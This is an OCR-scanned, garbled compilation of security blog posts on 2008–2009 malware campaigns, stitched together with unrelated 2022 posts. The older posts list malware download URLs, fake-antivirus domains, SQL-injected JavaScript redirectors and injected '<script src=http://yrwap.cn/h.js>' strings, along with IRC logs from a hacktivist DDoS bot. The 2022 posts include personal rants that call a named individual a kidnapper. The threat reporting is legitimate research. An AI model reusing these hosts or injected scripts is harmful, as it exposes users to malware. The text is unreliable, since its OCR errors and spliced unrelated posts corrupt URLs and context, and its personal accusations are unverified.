hxxp://qaz[.Jim/index[.]php?a=delete &q=1521319441 
hxxp://qaz[.Jim/load/i7zi32/Z4EZfS 
hxxp://qaz[.]im/index[.]php?a=delete &q=271015813 
hxxp://qaz[.]im/load/R7H9eS/9F6B8R 
hxxp://qaz[.]im/index[.]php?a=delete &g=1714150667 
hxxp://qaz[.]im/load/EK4aSN/NtSSta 
hxxp://qaz[.]im/index[.]php?a=delete &q=1701669992 
hxxp://qaz[.]im/load/nY8bhS/HA9a6r 
hxxp://qaz[.]im/load/3fR22B/NQFT4k 
hxxp://qaz[.]Jim/load/d9dzRf/bf4zZB 
hxxp://qaz[.]Jim/index[.]php?a=delete &g=904471798 
hxxp://qaz[.]im/load/iASYFE/N2T6Hs 
hxxp://qaz[.]im/index[.]php?a=delete &q=167022791 
hxxp://qaz[.]im/load/nA8bES/KaHZiF 
hxxp://qaz[.]im/index[.]php?a=delete &q=2050734794 
hxxp://megal[.]nz/file/K2p33LDC 
hxxp://qaz[.Jim/load/rBS2BA/d79HD8 
hxxp://megal[.]nz/file/3r5nFLaD 
hxxp://qaz[.]im/load/YBkfBf/R5zr3k 
hxxp://qaz[.]im/load/4QtByK/r26Hhi 
hxxp://qaz[.]Jim/load/8Fda5T/RanEDT 
hxxp://qaz[.]im/index[.]php?a=delete &q=2077971609 
hxxp://qaz[.]Jim/load/KaSFtf/ib757y 
hxxp://qaz[.Jim/index[.]php?a=delete &q=327039928 
hxxp://qaz[.]im/load/teHt9Y/bfsheh 
hxxp://qaz[.]im/index[.]php?a=delete &q=1200050631 
hxxp://qaz[.Jim/load/b2Zt3G/9ASAAN 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1639450345 
hxxp://qaz[.]im/load/8YKksY/eAkFbN 
hxxp://qaz[.]im/index[.]php?a=delete &q=1427333276 
hxxp://wikiapply[.]ir/Scrip[.]Jexe 
hxxp://shighil[.]com/Scrit[.]exe 
hxxp://shighil[.]com/Scrip[.Jexe 
hxxp://shighil[.]com/Print[.lexe 
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hxxp://cdn-114[. Janonfiles[.]com/ZfSf52X20c/76279be8-1600685243/morl12 5[.]exe 


hxxp://qaz[.]im/load/d2d4Z2/iS3y95 
hxxp://qaz[.]im/load/7 KH4fh/h3BYe7 

hxxp://qaz[. ]im/load/4bE6St/6SkhrR 
hxxp://qaz[.]im/index[.]php?a=delete &g=1257759577 
hxxp://qaz[.]im/load/N43SYa/haaAke 
hxxp://qaz[.]im/index[.]php?a=delete &q=824347637 
hxxp://qaz[.]im/load/6Q754h/YdsFfA 
hxxp://qaz[.]im/index[.]php?a=delete &q=1542694279 
hxxp://qaz[.]im/load/s9nSZs/atKAEe 
hxxp://qaz[.]im/index[.]php?a=delete &q=1941126442 
hxxp://qaz[.]im/load/4HHT94/z6t67T 
hxxp://qaz[.]im/load/BNN6FN/Zb8Grf 
hxxp://dropmefiles[.]com/HEsaB 
hxxp://dropmefiles[.]com/vePdp 

hxxp://qaz[. Jim/load/e8hk25/bD6Qt9 
hxxp://qaz[.]im/index[.]php?a=delete &q=121735144 
hxxp://qaz[.]im/load/F4kTfd/6FKKT7 
hxxp://qaz[.]im/index[.]php?a=delete &q=1240774806 
hxxp://megal[.]nz/file/BIgHjKYR 
hxxp://qaz[.]im/load/znk3Zz/siRikKb 
hxxp://qaz[.]im/index[.]php?a=delete &q=584524562 


hxxp://ncdzrppa5xl3vw5 7|k6x3prcj5p63y3m46t4giq6rvdsa3woed3hicid[.Jonio 
Nomoru 


hxxp://qaz[.]im/load/HebsRi/dD767Z 
hxxp://qaz[.]im/index[.]php?a=delete &q=896806393 
hxxp://qaz[.]im/load/sQa6dA/6KZHsD 
hxxp://qaz[.]im/index[.]php?a=delete &q=1957336485 
hxxp://qaz[.]lim/load/4ANTNnQ/5zyZk5 
hxxp://qaz[.]im/index[.]php?a=delete &q=769602651 
hxxp://qaz[.]im/load/TR5G83/GiezSn 
hxxp://qaz[.]im/index[.]php?a=delete &q=454324870 
hxxp://qaz[.]im/load/tHah6z/dZ4HSY 
hxxp://qaz[.]im/index[.]php?a=delete &q=268245740 
hxxp://qaz[.]im/load/bbEafh/Htht89 
hxxp://qaz[.]im/index[.]php?a=delete &q=863818119 
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hxxp://qaz[.]im/load/2kB7zb/BYnBE6 
hxxp://qaz[.Jim/index[.]php?a=delete &q=688090136 
hxxp://qaz[.]im/load/KKdeSe/EK7hTz 
hxxp://qaz[.Jim/index[.]php?a=delete &q=581866186 
hxxp://qaz[.Jim/load/AaHb4s/5Q8EZD 
hxxp://qaz[.]im/index[.]php?a=delete &q=640300586 
hxxp://qaz[.]im/load/5D8RRf/KeDA38 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1975888770 
hxxp://qaz[.]im/load/G2i6aZ/EdNrRH 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1286055335 
hxxp://qaz[.]im/load/tQkNQA/4F6SHK 
hxxp://qaz[.]im/index[.]php?a=delete &q=640240913 
hxxp://qaz[.]im/load/bQt26G/dR22Yy 
hxxp://qaz[.]im/index[.]php?a=delete &q=467119657 
hxxp://qaz[.Jim/load/Q26Tad/d8FH3Y 
hxxp://qaz[.]im/index[.]php?a=delete &q=1039249552 
hxxp://qaz[.]im/load/Qt6Qrb/KF8z76 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1950534033 
hxxp://qaz[.]im/load/7 QDhks/RH6s98 
hxxp://qaz[.Jim/index[.]php?a=delete &q=445072114 
hxxp://qaz[.]Jim/load/S3T3t4/fN942Z 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1981918945 
hxxp://qaz[.Jim/load/4BKhhn/SQTYtt 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1894943134 
hxxp://qaz[.]Jim/load/4da52S/yh8dr3 
hxxp://qaz[.]im/index[.]php?a=delete &q=2002995939 
hxxp://qaz[.]im/load/zh66AQ/yYNdhZ 
hxxp://qaz[.Jim/index[.]php?a=delete &g=1187055275 
hxxp://qaz[.]im/load/sRiG5z/iKKaZD 
hxxp://qaz[.]im/index[.]php?a=delete &q=695551884 
hxxp://qaz[.]im/load/BR7zSz/tnB4R9 
hxxp://qaz[.]im/index[.]php?a=delete &q=470925428 
hxxp://qaz[.]im/load/7 GkDdE/R4Az7G 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1537725285 
hxxp://qaz[.Jim/load/eH42bk/zBt3T6 
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download-all4free .com 
download-softarch .com 
dwnild-files .com 
get-frsh-files .com 
download-fls.com 
downloadall-soft-now .com 
downloadallsoft-now. com 
download-allsoftnow .com 
downloadallsoftnow .com 
soft-4-you-download .net 
get-files-4free .net 
download-top-software .net 
files-download-arch .net 
download-files-bak .net 
download-files-plus .net 
pure-download-new .net 


[6]69.59.21.247 
uni-tube-911 .com 
bestmytubeonilnel .com 
bestmytubeonilne2 .com 
bestmytubeonilne3 .com 
mybest-pov-tube .com 
my-bestpov-tube .com 
u-tube-verse .com 
tubeger .com 
tube-4-free-center .com 
tube-4you-best .com 
tube-hu .com 
tube-more-sex .com 
quickly-porn-tube .net 
fast-xxx-tube .net 
tube-chick .net 
tube-free-4-adult .net 


antivir-av-toolz .net 
scanner-pc-toolz .net 
av-scan-soft .net 
av-scan-here .net 
anti-vir-toolz .com 
freenonline-scannerw .com 
freenonline-scanner .com 
av-mc-antivir-checker .com 
freenonline-scannera .com 
bestmyscanneronilne3 .com 
bestmytubeonilne3 .com 
bestmyscanneronilne2 .com 
bestmytubeonilne2 .com 


[7]94.247.3.232 
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viewerdownload2009 .com 
freedownload2009 .com 
filesstorage2009 .com 
exefileshere2009 .com 
bestfilesarchive2009 .com 
softwareviewers2009 .com 
filesinnet4you2009 .com 
downloadfilesservice .com 
jetexestorage .com 
clickandgetfile .com 
secretfilesstoragehere .com 
x-filesstorehere .com 
filesportalhere .com 
exefileshere .com 
extrafilesonlyhere .com 
pornexearchive .com 
viewerarchive .com 
crystalfilesarchive .com 
download2009exe .com 
3d-softwareportal .com 
downloadfilesportal .com 
exesoftportal .com 
softwareportalexefiles .com 
becollectionoffiles .com 
extracoolfiles .com 
freepornclips2u .com 
filesstorage4you.com 
downloadexenow .com 


The same people, the same tactics, different domains and netblocks used. 


ttp://blog.trendmicro.com/bogus-1linkedin-profiles-harbor-malicious-content/ 


_ https: //www.virustotal . com/analisis/377260b69e0345¢25802d439bc 1¢628a 
. https://www.virustotal.com/analisis/6a6adbd5f5bcbead9fa8be3fdcf27659 
. http://www. virustotal . com/analisis/a351529fd685a89817 4bd6f f3b90a82b 
. http: //whois .domaintools.. com/94.247 .3.228 

. http: //whois domaintools. com/69.59.21. 247 

. http://whois .domaintools . com/94.247 .3.232 


5.1.5 Domains Serving Internet Explorer Zero Day in December (2009-01-14 21:21) 
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BEAN - Seattle Cocktail Social <script src=http://yrwap.cnih js ... 

This site may harm your computer. 

16 Sep 2008 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script 
src=http:// yrwap.cn/h.js> Photo #2 - (0 comments) ... 

www. beanonline. org/photos. asp?id=295 - 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnih Js ... 

This site may harm your computer. 

<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http:// 
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ... 
www. beanonline. org/photos. asp?id=245 - 
More results from www. beanonline.org » 


Similar pages - 


Decentxposure :: Thursday/Envy Split<script src=http://yrwap.cnhh ... 
Temporary Residence Records — 11/12/2008. | almost forgot to mention this at all , and that 


would be a pure tragedy. Thursday is back, and dare | say better... 


Online Branding Report<script src=http ://yrwap.cnih.js></script ... 


This site may harm your computer. 

Creating a fabulous, unique product along with a companion, sharp-dressed Web site doesnt 
guarantee success. VVhat good are a product and a site if no one... 

internetviz. e-seminars. biz/VVebinar/Booklnformation.asp?ID=?7 &source=nslr - 


olmilar pages - 


leaf<script src=http:-//yrwap.cnih.js></script=Products Indianleaf ... 

This site may harm your computer. 

leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters 
Buyer. 

my.expomarkets. com/catalog-manager/productlist.asp?sscatid=507 - | 


Similar pages - 


ST 1<script src=http://yrwap.cnih.js=</script=<script src=hittp ... 
Satellite TY charts all over the world from Asia, Europe, Atlantic and America. Daily updated 
satellite information. 


December, 2008 was marked by yet another [1]widespread Koobface campaign, next to a 
[2]massive SQL injection attack targeting Asian countries and serving the ex-Internet Explorer 
XML parsing zero day. Monitoring the attack closely and issuing abuse notices, it’s worth 
pointing out that only two domains were SQL to target international sites, with the rest injected 
at Asian sites only. 


This tactic once again demonstrates the dynamics of the international underground com- 
munities whose understanding of valuable stolen goods greatly differ based on the local 
market’s demand for a particular item. For instance, stolen accounting data for a MMORPG is 
more than access to a stolen banking account on the Chinese underground marketplace, and 
exactly the opposite on the Russian underground marketplace. Interestingly, if the IE zero day 
was first discovered and abused in a targeted nature by Russian parties the very last thing 
they’d be serving is a password stealer for a MMORPG given the far more valuable from their 
perspective crimeware. Here are all of the SQL injected domains participating in the attack, 
with two Chinese groups responsible for them : 


SQL injected domains currently active: 
- c.nuclear3 .com/css/c.js (121.10.108.161; 121.10.107.233;70.38.99.97) also SQL injected as 
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c. %6Euclear3 .com/css/c.js in a cheap attempt to avoid detection 

- zS.gcp.edu .cn/z.js redirects to alimcma .3322.0rg/a0076159/a07.htm (121.12.173.218) and 
then to tongjitj.3322 .org/tj/a07.htm 

- w.94saomm .comijs.js (58.53.128.177) redirects to clc2007.nenu.edu_.cn/tt/swf.htm 
(218.62.16.47) 

- idea21.org/h.js (66.249.130.142) redirects to idea21 .org/index1.htm 

- yrwap .cn/h.js (59.63.157.71) redirects to kodim .net/CONTENT/faq.htm 


Currently down, for historical preservation purposes and case building as these were ex- 
clusively serving the ex-lE zero day in December, 2008: 
17gamo .com/1.js 

s4d. in/h.js 

dbios .org/h.js 

armsart .com/h.js 
acglgoa .com/h.js 

9i5t .cn/a.js 

qq117cc .cn/k.js 

s800qn .cn/csrss/w.js 
twwen .com/1.js 
s.shunxing .com.cn/s.js 
ko118 .cn/a.js 

s.shunxing .com.cn/s.js 
17aq .com/17aq/a.js 
s.kaisimi .net/s.js 
sshanghai .com/s.js 
s.ardoshanghai .com/s.js 
s.cawjb .com/s.js 

mysy8 .com/1/1.js 

mvoyo .com/1.js 
nmidahena .com/1.js 
tjwh202.162 .ns98.cn/1.js 


Thankfully, the IE zero day attack in December is an example of a "wasted" zero day, 
with the potential for abuse not taken advantage of. 


Related posts: 

[3]Massive SQL Injection Attacks - the Chinese Way 

[4]Yet Another Massive SQL Injection Spotted in the Wild 

[5]Obfuscating Fast-fluxed SQL Injected Domains 

[6]Smells Like a Copycat SQL Injection In the Wild 

[7]SQL Injecting Malicious Doorways to Serve Malware 

[8]SQL Injection Through Search Engines Reconnaissance 

[9]Stealing Sensitive Databases Online - the SQL Style 

[10]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[11]Sony PlayStation’s site SQL injected, redirecting to rogue security software 
[12]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 


1. http://ddanchev. blogspot .com/2008/12/dissecting-koobface-worms-december .htm 
2. http://blogs.zdnet .com/security/?p=2328 


3. http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 
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4. http: //ddanchev. blogspot. 
5. http: //ddanchev. blogspot. 
6. http: //ddanchev. blogspot. 
7. http://ddanchev. blogspot. 
8. http: //ddanchev. blogspot. 
9. http: //ddanchev. blogspot. 


com/2008/05/yet-another-massive-sql-injection. html 
com/2008/07/obfuscating-fast-fluxed-sql-injected. html 
com/2008/07/smells-like-copycat-sql-injection-in. html 
com/2008/07/sql-injecting-malicious-doorways-to.html 
com/2007/07/sql-injection-through-search- engines. html 
com/2008/05/stealing-sensitive-databases-online-sql . html 


10. http: //blogs.zdnet .com/security/?p=1122 
11. bttp://blogs.zdnet .com/security/?p=1394 
12. http: //blogs.zdnet .com/security/?p=1118 


5.1.6 Pro-lsraeli (Pseudo) Cyber Warriors Want your Bandwidth (2009-01-15 00:00) 


yh Contribute to the Effort 


Horie*Papeeh instractions/@) Dewnload 


; Francais | Portugués | Pycexni | Espafiol | English | nay 


In the very same fashion in which [1]Chinese cyber warriors utilized the "[2]people’s infor- 
mation warfare concept" against [3]CNN, followed by [4]Russia vs Estonia cyberattack, the 
[5]Russia vs Georgia cyberattack, and the [6]Electronic Jihad grassroots [7] movement attempt, 
pro-Israeli (pSeudo) cyber warriors have released an application which once run would allow 


Who are we? 
‘We are 8 group of students who are tired of sitting around doing nothing Reports from the communicabon werfare 
while the chizens of Sderot and the cites around the Caza Sip are between israel and Hamas: 

NO MORE: 


‘We wal not st around and wetch our chiédven fear and cry out for help 
while the missiles are flying over thew headst 
We say NO MORE: 


What have we done about it? 

‘We created 8 project that unites the computer capabilities of many a 

Cael ts ins ts poser b order ene commie ns powrenld iy corey erscs 
Gestroy the state of Isreal. ‘Socal netevorks brk terrorists 

‘The more support we get, the efficent we aret 


How can can you help? 
‘ag yr ale Fe eae wd onal ba kms eee 
There is a 


them to direct the supporters’ bandwidth to well known pro-Hamas web sites. 
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Each of these campaigns is orbiting around a unique application released on behalf of 
the coordinators. In China vs CNN campaign it was anticnn.exe, in the [8]Electronic Jihad cam- 
paign it was e-jihad.exe, and in the pro-Israeli hacktivists vs Hamas it is [9]PatriotInstaller.exe. 
Excluding anticnn.exe which was working, both e-jihad.exe and PatriotInstaller.exe act as 
examples of how people’s information warfare execution goes wrong. How come? The tools 
failed to deliver what they promised. An idle bot that | left upon becoming a patriotic supporter 
of the cause, indicated that the participants are basically idling, without any active DDoS 
attacks against a particular pro-Hamas web site. 


* NILS-D82B308006796063 (Nils@irc .help-israel-win.org) has joined #dbg 
<NILS-D82B36B6C6796663> Indexet 14g utanfor granserna fér matrisen.: at x.a(Object A_8, aa A_1) 
<NILS-D82B3 68 006796663> t bo.v(at A_6) 

<NILS-D82B36B6C6796663> voke(Object A_6, ax A_1) 

<NILS-D82B36B6C06796663> t x.i() 

* NILS~-D82B30B8006796063 (Nils@irc.help-israel-win.org) has left tdbg 

* XP-2041 (XP-2641@irc .help-israel-win.org) has joined tdbg 

* XP-2041 (XP-2041Girc .help-israel-win.org) has left t#dbg 

PatrioticGuy is patriot@irc.help-israel-win.org * PatrioticGuy 

PatrioticGuy is a registered nick 

PatrioticGuy on @idbg 

PatrioticGuy using irc3.help-israel-win.org Patriots 3 

PatrioticGuy has been idle thr 3mins 48secs, signed on Thu Jan 68 21:42:12 
PatrioticGuy End of /WHOIS list. 

» @PatrioticGuy (patriot@irc.help-israel-win.org) Quit (Connection reset by peer) 
* LAPTOP1532363 (Sally@irc.help-israel-win.org) has joined Sdbg 
<LAPTOP1532363> Index was outside the bounds of the array. 

* LAPTOP1532363 (Sally@irc.help-israel-win.org) has left tdbg 

* SILENTROGUE3221715 (Nati@irc.help-israel-win.org) has joined #dbg 
<SILENTROGUE3221715> couldn't not connect: at x.f() 

* SILENTROGUE3221715 (Nati@irc.help-israel-win.org) has left #dbg 
SILENTROGUE3221715 is Nati@irc.help-israel-win.org * SILENTROGUE3221715 
SILENTROGUE3221715 using ire3.help-israel-win.org Patriots 3 
SILENTROGUE3221715 has been idle 6mins 49secs, signed on Thu Jan 68 23:53:42 
SILENTROGUE3221715 End of /WHOIS list. 

LAPTOP1532363 is Sally@irc.help-israel-win.org * LAPTOP1532363 

LAPTOP1532363 using irc3.help-israel-win.org Patriots 3 

LAPTOP1532363 has been idle 24mins 6secs, signed on Thu Jan 68 23:36:33 
LAPTOP1532363 End of /WHOIS list. 

* BITTERMAN-KIDS3608921 (Susan@irc.help-israel-win.org) has joined tdbg 
<BITTERMAN-KIDS3668921> Index was outside the bounds of the array.: at x.a(O0bject A_6, aa A_1) 
<BITTERMAN-KIDS3608921> bo.v(a1 A_®8) 

<BITTERMAN-KIDS3668921> oke(Object A_G, ax A_1) 

<BITTERMAN-KIDS3608921> x.i() 


Who are the people behind the project? 


"We are a group of students who are tired of sitting around doing nothing while the citizens 
of Sderot and the cities around the Gaza Strip are suffering, NO MORE! We will not sit around 
and watch our children fear and cry out for help while the missiles are flying over their heads! 
We say NO MORE! 


We created a project that unites the computer capabilities of many people around the 
world. Our goal is to use this power in order to disrupt our enemy’s efforts to destroy the state 
of Israel. The more support we get, the efficient we are! 


You download and install the file from our site. The file is harmless to your computer and 
could be immediately removed. There is no need for identification of any kind - anonymity 
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guaranteed! 


The Help-Israel-Win movement is naturally feeling the heat as well, and is constantly switching 
locations, with its currently active one - borabora.globat.com/ help-israel-win.com. The 
following are related domains used by the pro-Israeli cyber warriors: 


ronshalit.dot5hosting.com 
help-israel-win.com 
help-israel-win.tk 
help-israel-win.info 
helpisraelwin.com 


In times when [10]DDoS attacks can be cost-effectively outsourced, it’s pretty surprising that 
all the cyber warriors - excluding the ones in the Russia vs Georgia cyberattack - aren’t taking 
advantage of the concept, but are relying on grassroots movement. The reason for this is the 
lack of contact points between the sellers of the DDoS services and the potential buyers, at 
least for the time being. 


Monitoring of the pro-Israeli patriot campaign would continue, with updates posted as soon as 
something actually happens. 


 inep://Adanchev ‘blogepot.con/2008/04/chinese-hacktiviete-vaging-peopleshtall 
_http:/ adanchev blogspot .con/2007/10/peoples-infornation-varfare~concept. hin] 
| http:/ adanchev blogspot .con/2008/04/ddos~ attack-ageinst~cancon-htal 

. http: //ddanchev. blogspot . com/2007/08/your-point—of-view-requested. html 


ttp://blogs.zdnet .com/security/?p=1670 


. http: //ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber- jihad. htm 
firey: //atenchey bLogapet  con/ 2007/06 eyoor™Jikediat- dow” took 3a 
_hvtp://adanchev. blogspot. con/2001/1/electronic~jihads~targets-1ist_htall 
"hcep://unuvirustotal.con/analisis/e26ec30ae382<b0ec6bA0415190967 

10. http: //ddanchev blogspot . com/2007/10/botnet-on-demand-service . html 


1 
2 
3 
4 
5 
6 
7 
8 
9 


5.1.7 Embedding Malicious IFRAMEs Through Stolen FTP Accounts - Part Two 
(2009-01-19 17:29) 
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The practice of using stolen or data mined - from a botnet’s infected population - FTP accounts 
is nothing new. In March, 2008, a tool originally published in February, 2007, got some 
publicity once [l1]details of stolen FTP accounts belonging to Fortune 500 companies were 
found in the wild. Interestingly, none of the companies were serving malicious iFrames on 
their compromised hosts back then. 


Despite the fact that 2008 was clearly [2]the year of the massive SQL injection attacks hitting 
everyone, everywhere, massive iFrame injection tools through stolen FTP accounts are still in 
development. Take for instance this very latest console/web interface based proprietary one 
currently offered for sale at $30. 
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Its main differentiation factors according to the author are the pre-verification of the account- 
ing data in order to achieve better speed, advanced logs management and update feature 
allowing the malicious campaigner to easily introduce new iFrame at already iFrame-ED hosts 
through the compromised FTP accounts, and, of course, the what’s turning into a commodity 
feature in the face of long-term customer support. In this case, that would be a hundred FTP 
accounting details to get the customers accustomed to the tool’s features. 


Interestingly, at least according to the massive SQL injections taking place during the 
entire 2008, iFrame-ing has reached its decline stage, at least as the traffic acqusition/abuse 
method of choice. And with SQL injections growing, this very same FTP account data is serving 
the needs of the blackhat search engine optimizers bargaining on the basis of a pagerank. 


. http://ddanchev. blogspot .com/2008/03/embedding-malicious-iframes- through. htm 


[11] 
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[12] 


Liana Pycua cera ucKka NDEMMEP-NOxRKapHMKap, a BHE TYKa 
MP dHKaTe 
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@) SKANKER 
@svesten ga nutame @JavorKolev kakso cTaBa C 


@king__long 
Related posts: 
[14]Courtesy of Republic of Bulgaria! 


[15]A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis 


[16]An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law En- 
forcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis 


[17]What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To 
the Almighty Savior! - An Analysis 


[18]Dancho Danchev’s Disappearance - An Elaboration - Part Two 
[19]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 


[20]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Three 
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[21]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Two 


[22]Deep from the Trenches in Bulgaria - Part Three 
[23]Deep from the Trenches in Bulgaria - Part Two 


[24]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 


TayescKku/ABop Kones) - An Elaboration on Dancho Danchev 
An Analysis 
1. | ggTW2Vz3D6KyaL6Nyp-wkhaT5SJvqhtko2ue4MCW2VQ_-UpxsGEZZhgyx 
o54KCIPztGec3VSMuuPetNxORLIt84_4DVeJKthYXO5U6DLUS-Tiyp 
ttps://blogger . googleusercontent.com/img/a/AVvXsEiExlyihedMPY2Km1I JRyRjW1k8 jh7xhmpMcvPkGKOHO4S4ICRqmJ1£ iO 
ivWhs2hSJh7hJf£UWM- jFQNGjmN1lxifggxagigDx1slXomAoLGH2s89x 
« 


NM 


Aad 


tps://blogger . googleusercontent .com/img/a/AVvVXsE 

ttps://blogger . googleusercontent.com/img/a/AVvXsEjpOIBDbF6cuZwn1iWJtpbBUkINoZoPO5anr_unT90zDBheXbEASI7K£Mc 
naWqnzo8d7uc9k3BWuPAKt GKOKOGddSP8eI AUKSADHAbOKIT3jdble 
https: //blogger . googleusercontent .com/img/a/AVvXsE 
jTy_UIn4fZcm9RCmQ- ioJ6w7D-4wOhTR6DtR1_eceX1TGH8eo: 


t 
g8ygrs1N8ViM4NLv8UXkz502b0ZAnBvIFz8dvWyHbaRUkeLrHO-X- 
t 


> 


o! 
Kt 


9. https://blogger . googleusercontent . com/img/a/AVvXsEhGqnf3MbxNLz9Jo-1JmwiZ-h5EAXBW_b-Z10Q5jEiMaQW1ifFAIoyWN. 
0. 
nlirZgcfqcP1f641N1nBpfDzkzqMhj oYMftpKuR9Ty03MAxQnDdENOg- 

11. 
12. 
13. 
14, https: //ddanchov. blogspot. con/2022/02/courtesy-of-republi-of bulgaria. heal 
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https ://ddanchev. blogspot . com/2021/02/dancho-danchevs-disappearance- 2010. htm 
https ://ddanchev. blogspot .com/2021/10/deep-from-trenches-in-bulgaria-part .htm 


. https: //ddanchev.blogspot .com/2021/09/deep-from-trenches- in-bulgaria-part-two.htm 


18.3.3 Courtesy of Republic of Bulgaria! - Part Three (2022-03-20 14:50) 


The nukes are coming! The nukes are coming! 


Enjoy! 

Related posts: 

[1]Courtesy of Republic of Bulgaria! - Part Two 
[2]Courtesy of Republic of Bulgaria! 


[3]A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis 


[4]An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law En- 
forcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis 


[5]What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To 
the Almighty Savior! - An Analysis 


[6]Dancho Danchev’s Disappearance - An Elaboration - Part Two 
[7]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 


[8]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Three 


[9]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Two 


[10]Deep from the Trenches in Bulgaria - Part Three 
[11]Deep from the Trenches in Bulgaria - Part Two 


[12]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 
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[13]A Profile of a Bulgarian Kidnapper - Pavlin Georgiev (NapnuH Feoprues/Bacun Moes 
Tayescku/ABop Kones) - An Elaboration on Dancho Danchev’s Disappearance circa 2010 - 
An Analysis 


. https://ddanchev.blogspot .com/2022/03/courtesy-of-republic-of-bulgaria-part.htm 
. https: //ddanchev. blogspot .com/2022/02/courtesy-of-republic-of-bulgaria. htm 
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. https://ddanchev. blogspot .com/2021/09/deep-from-trenches- in-bulgaria-part-two.htm 


12. https://ddanchev. blogspot . com/2020/12/how-i-got-robbed-and-beaten-and.htm 


13. https://ddanchev. blogspot .com/2021/11/a-profile-of-bulgarian-kidnapper-pavlin. htm 


18.3.4 Assessing the U.S Intelligence Community’s Annual Threat Report for 2022 
(2022-03-24 11:13) 


[1] 


Annual Threat Assessment 


INTELLIGENCE 
COMMUNITY 
ASSESSMENT 


In the most recently released "[2]U.S Intelligence Community’s Annual Threat Report for 2022" 
the U.S Intelligence Community states that China remains the U.S’s most sophisticated and 
relevant cyber adversary which possesses the necessary sophistication to target the country 
both using cyber espionage and attacks against U.S critical infrastructure. 
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5.1.8 A Diverse Portfolio of Fake Security Software - Part Fourteen (2009-01-19 22:03) 


G Antivirus 2009 


Local Disk (C:) 


ems processed 212 
ERRORS FOUND: 7 


Local Disk (0:) Local Settings 


=~ @ system errors =~ @ 00 errors a] @ infectes 


(ii. 

if You system might be at riskt! 

Spywere and system perfomance scanning are saried... 
XN 


Capyreght © 2007 - 2000 XP antovires | All Raghts Reverend 


The following currently active fake security software domains have been included within 
ongoing blackhat SEO campaigns, among the many other tactics that they use in order to 
attract traffic to them. Needless to say that the Diverse Portfolio of Fake Security Software 


domains series is prone to expand throughout the year. 


rapidspywarescanner .com (78.47.172.67) 
live-antiviruspc-scan .com 
professional-virus-scan .com 
proantiviruscomputerscan .com 
bestantivirusfastscan .com 
premium-advanced-scanner .com 


Domain owner: 

Name: Aennova M Decisionware 
Organization: NA 

Address: Rua Maestro Cardim 1101 cj. 112 
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An excerpt: 


"We assess that China presents the broadest, most active, and persistent cyber espionage 
threat to U.S. Government and private sector networks. China’s cyber pursuits and export 
of related technologies increase the threats of attacks against the U.S. homeland, suppres- 
sion of U.S. web content that Beijing views as threatening to its control, and the expansion of 
technology-driven authoritarianism globally." 


The report actively discusses Iran, North Korea, China and Russia in a variety of dangerous 
aspects to U.S National Security with the report courtesy of the U.S Intelligence Community. 


What the report also emphasizes on is the use of malicious influence both in the cyber domain 
and internationally where the U.S publicly acknowledges in its report that China is attempting 
to mimic Russia on its way to launch foreign influence operations serving the needs of China 
by using publicly disclosed training material and real-life case studies courtesy of Russia in 
terms of foreign influence operations which could set a dangerous precedent in case China 
fully realizes the vast potential of Russian’s capabilities in foreign influence operations that 
also includes the cyber domain on its way to dominate a country including the information and 
electromagnetic spectrum which also includes the launching of foreign influence campaigns 
both in real-life and virtually. 


1. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEhONrh jmY oVgZb2w9sUxd1kjLbVAVdnm0AZGzbGf wh03aVMO 
X6r2ET48 j CDITUBnsHdyThd9pVogFG_NJD4xAGOhUG2aKVdKFQxbt9 
2. https://www.dni.gov/files/ODNI/documents/assessments/ATA-2022-Unclassified-Report. pdf 


18.3.5 Israel Blocks Ukraine From Purchasing Pegasus Spyware (2022-03-24 11:14) 


[1] 
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According to the [2]Guardian Israel blocked Ukraine from purchasing the Pegasus spyware 
from the infamous NSO Group vendor of lawful surveillance hacking tools. 


Not surprisingly this is a bit over-exaggerated and self-serving statement that actually does 
more PR harm other than good despite the fact that the article is mentioning Israel’s "[3]2007 
Defense Export Control Act" which prevents the country from selling access to lawful surveil- 
lance type of hacking tools to other countries. 


Appreciate the rhetoric. Since when does a country that’s basically denying other countries 
the opportunity to buy commercial lawful surveillance hacking tools from them is positioning 
itself as as a market-leading provider of commercial lawful surveillance hacking tools? Basically 
never. Long story short any country that wants to monitor journalists or basically launch lawful 
surveillance campaigns using hacking tools against individuals can basically outsource the 
malicious software "know-how" to local companies that develop such type of tools. 


Positioning yourself as a market and country-tolerated vendor of commercial and market lead- 
ing lawful surveillance hacking tools is prone to result in negative publicity and basically turn 
and position the company as a mockery among hardcore vendors of commercial and lawful 
surveillance hacking tools that also includes the bad guys including other nations that develop 
and actually present such releases on the market. 


